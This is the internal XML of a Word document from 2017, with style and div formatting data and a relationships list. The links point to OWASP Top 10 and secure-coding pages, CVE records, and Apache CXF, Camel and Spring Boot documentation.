            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="6" w:space="2" w:color="999999"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2017997253">
          <w:marLeft w:val="300"/>
          <w:marRight w:val="300"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="dashed" w:sz="12" w:space="3" w:color="444444"/>
            <w:left w:val="dashed" w:sz="12" w:space="3" w:color="444444"/>
            <w:bottom w:val="dashed" w:sz="12" w:space="3" w:color="444444"/>
            <w:right w:val="dashed" w:sz="12" w:space="3" w:color="444444"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1874462753">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1605452941">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1625959157">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="849753324">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="45"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="6" w:space="2" w:color="999999"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1632906831">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1343513761">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="45"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="6" w:space="2" w:color="999999"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1635677913">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1645620736">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1789856323">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="18999034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440">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="45"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="6" w:space="2" w:color="999999"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1769808955">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1984112676">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1155607995">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="45"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="6" w:space="2" w:color="999999"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="211413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spring.io/spring-security/site/docs/current/reference/html/csrf.html" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/PBKDF2" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-5638" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Web_page" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://i0.wp.com/blog.restlet.com/wp-content/uploads/2015/12/simple-request.png" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://itsecurity.telelink.com/category/it-threats/corporate-endpoint-desktop-threats/" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/dn905221(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cxf.apache.org/docs/tools.html" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://camel.apache.org/components.html" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.javarticles.com/2015/05/apache-camel-timer-component-examples.html" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cucumber.github.com/cucumber-eclipse/update-site" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017-A3-Cross-Site_Scripting_(XSS)" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.callicoder.com/spring-boot-rest-api-tutorial-with-mysql-jpa-hibernate/" TargetMode="External"/><Relationship Id="rId92"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owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/CSRFGuard" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017-A9-Using_Components_with_Known_Vulnerabilities" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.ietf.org/html/rfc7519" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cross-origin_resource_sharing" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://itsecurity.telelink.com/category/it-threats/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.ietf.org/html/rfc2246" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cxf.apache.org/javadoc/latest/org/apache/cxf/transport/http/HTTPSession.html" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vasu34k123/AvivaFuseVirtualSession2/wiki/Aviva-Requirement" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://camel.apache.org/tutorial-example-reportincident.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cxf.apache.org/docs/configuration.html" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://camel.apache.org/uris.html" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sonatype.com/nexus-repository-sonatype" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017-A6-Sensitive_Data_Exposure" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Content_Security_Policy" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017-A7-Insufficient_Attack_Protection" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.playframework.com/documentation/2.5.x/JavaCsrf" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://scotthelme.co.uk/csrf-is-dead/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mojohaus.org/versions-maven-plugin/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Domain_name" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.gif"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.chromium.org/2015/02/hello-http2-goodbye-spdy.html" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vasu34k123/AvivaFuseVirtualSession2/tree/master" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vasu34k123/AvivaFuseVirtualSession2" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://camel.apache.org/tutorial-example-reportincident.html" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017-A8-Cross-Site_Request_Forgery_(CSRF)" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://itsecurity.telelink.com/category/it-threats/corporate-wan-threats/" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.callicoder.com/spring-boot-rest-api-tutorial-with-mysql-jpa-hibernate/" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://camel.apache.org/user-stories.html" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://restapi.demoqa.com/utilities/weather/city" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017-A5-Security_Misconfiguration" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017-A8-Cross-Site_Request_Forgery_(CSRF)" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Same-origin_policy" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Https" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cxf.apache.org/docs/interceptors.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://csrc.nist.gov/groups/STM/cmvp/documents/140-1/140val-all.htm" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/REST_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://http2-explained.readthedocs.org/en/latest/src/http2firefox.html" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cxf.apache.org/docs/springboot.html" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vasu34k123/BDD-Java-JavaScript" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017-A2-Broken_Authentication_and_Session_Management" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017-A4-Broken_Access_Control" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ZAP" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dotnetcurry.com/aspnet/1343/aspnet-core-csrf-antiforgery-token" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/retirejs/retire.js/" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://i1.wp.com/blog.restlet.com/wp-content/uploads/2015/12/preflighted-request.png" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Transport_layer_security" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://caniuse.com/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cross-origin_resource_sharing" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://itsecurity.telelink.com/category/it-threats/data-center-networking-threats/" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cxf.apache.org/" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cxf.apache.org/docs/jax-rs.html" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vasu34k123/AvivaFuseVirtualSession2/wiki/Errors-Exceptions" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vasu34k123/AvivaFuseVirtualSession2/blob/master/CamelTEchnical" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.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wasp.org/index.php/Types_of_Cross-Site_Scripting" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017-A9-Using_Components_with_Known_Vulnerabilities" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2017-A10-Underprotected_AP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11931</TotalTime>
  <Pages>29</Pages>
  <Words>7350</Words>
  <Characters>41896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49148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Tripathi, Vishvadeep</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tripathi, Vishvadeep</cp:lastModifiedBy>
  <cp:revision>108</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-02T08:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-17T11:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>